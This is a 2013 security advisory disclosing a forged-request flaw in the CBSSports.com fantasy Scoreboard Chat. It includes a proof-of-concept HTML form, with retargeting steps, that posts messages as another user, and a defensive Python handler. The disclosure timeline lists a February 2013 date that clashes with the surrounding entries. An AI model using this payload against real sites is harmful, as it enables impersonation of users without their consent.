CBSSports.com Horizontal Access Control Bypass (Scoreboard Chat)

Summary
=========
The CBSSports.com fantasy sports sites did not properly enforce access control between user accounts at the same privilege level within the application. This behavior could be leveraged by an attacker to post messages to the Scoreboard Chat as an opposing team without the opposing team’s interaction, knowledge, or consent.

CVE number: Not Assigned
Impact: Medium
Vendor homepage: http://www.cbssports.com/
Vendor notified: 08/25/2013
Vendor fixed: 09/26/2013
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

Affected Products
=================
Confirmed in CBS Sports Fantasy Football and Fantasy Baseball properties. Other fantasy sports sites may have also been affected.

Details
=======
CBSSports.com fantasy sites allow authenticated users to perform sensitive actions without verifying that the user actually invoked the actions. In this instance, a CBSSports.com customer can submit requests to the application on behalf of other legitimate users.

Impact
=======
A malicious user could post Scoreboard Chat messages as an opposing team's owner without the opposing team's interaction, knowledge, or consent.

Solution
========
Enforce proper access control between user accounts at the same privilege level within the application. Implement access control decisions based on the permissions granted to the authenticated user associated with the submitted session identifier.
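As an added illustration of this solution (example code written for this write-up, not CBSSports.com's own; the handler name, form fields and session layout are assumptions), a server-side handler for the store-message endpoint that takes the sender from the authenticated session rather than from the client-supplied ``from`` field, and that requires a session-bound anti-forgery token so a form hosted elsewhere cannot submit on a logged-in user's behalf:

```python
import hmac
import hashlib
import json

# Constructed demo secret; a real deployment loads this from configuration.
SERVER_SECRET = b"constructed-demo-secret"


def csrf_token(session_id: str) -> str:
    """Per-session anti-forgery token: HMAC-SHA256 of the session id."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def store_message(session: dict, form: dict) -> dict:
    """Handle a store-message POST.

    session: server-side session resolved from the session cookie, e.g.
             {"id": "...", "user": "alice@vanilla.baseball.cbssports.com"}
    form:    parsed POST body carrying chat_domain, chat_msg and csrf_token.
    Both shapes are hypothetical; the point is where identity comes from.
    """
    # A form posted from another origin rides on the user's cookie but cannot
    # know a token bound to that user's session, so it is refused here.
    expected = csrf_token(session["id"])
    if not hmac.compare_digest(form.get("csrf_token", ""), expected):
        return {"status": 403, "error": "missing or invalid anti-forgery token"}

    try:
        msg = json.loads(form.get("chat_msg", ""))
    except json.JSONDecodeError:
        return {"status": 400, "error": "chat_msg is not valid JSON"}

    # The authorization decision is made on the authenticated user. A body
    # "from" that names any other account is an attempt to post as someone
    # else: reject it and return the details so they can be logged/alerted.
    claimed = msg.get("from")
    if claimed is not None and claimed != session["user"]:
        return {"status": 403, "error": "sender does not match authenticated user",
                "claimed_from": claimed, "actual_user": session["user"]}

    # Stamp the sender server-side so the stored record never trusts the body.
    msg["from"] = session["user"]
    return {"status": 200, "stored": msg}
```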

Proof-of-Concept
================
The following HTML form is included as a Proof-of-Concept (PoC).

To reproduce this in your own environment, the proof of concept will need to be modified as detailed below.

<html>
<body>
<form action="http://vanilla.baseball.cbssports.com/data/chat/store-message?client_type=scoreboardChat.openbaseball.mgmt" method="POST">
<input type="hidden" name="chat&#95;domain" value="vanilla&#46;baseball&#46;cbssports&#46;com" />
<input type="hidden" name="chat&#95;msg" value="&#123;&quot;event&quot;&#58;&quot;public&quot;&#44;&quot;from&quot;&#58;&quot;the_mcsass&#64;vanilla&#46;baseball&#46;cbssports&#46;com&quot;&#44;&quot;payload&quot;&#58;&#123;&quot;body&quot;&#58;&quot;Sharknado2&#92;n&quot;&#125;&#44;&quot;to&quot;&#58;&quot;vanilla&#46;baseball&#46;cbssports&#46;com&quot;&#44;&quot;type&quot;&#58;&quot;message&quot;&#125;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

  1. Change URL to the target league.
  2. Change the username value to the target user's username.
  3. Insert the message you want posted.

This file, or a link to a web hosted version of the file, can be opened by the malicious user. When the file is opened, the request inherits the identity and privileges of the user.

A decoded version of the request above is included to make it a little easier to read.

<html>
<body>
<form action="http://vanilla.baseball.cbssports.com/data/chat/store-message?client_type=scoreboardChat.openbaseball.mgmt" method="POST">
<input type="hidden" name="chat_domain" value="vanilla.baseball.cbssports.com" />
<input type="hidden" name="chat_msg" value='{"event":"public","from":"the_mcsass@vanilla.baseball.cbssports.com","payload":{"body":"Sharknado2\n"},"to":"vanilla.baseball.cbssports.com","type":"message"}' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Disclosure Timeline
===================
August 25, 2013: Disclosed to vendor (CBS Corporation).
August 26, 2013: Vendor’s initial response.
February 22, 2013: Vendor stated vulnerability had been remediated and a Responsible Disclosure policy was being drafted.
September 26, 2013: Confirmed successful vendor remediation.
September 26, 2013: Received vendor's Responsible Disclosure Policy.
September 30, 2013: Disclosed vulnerability publicly.


Christopher Emerson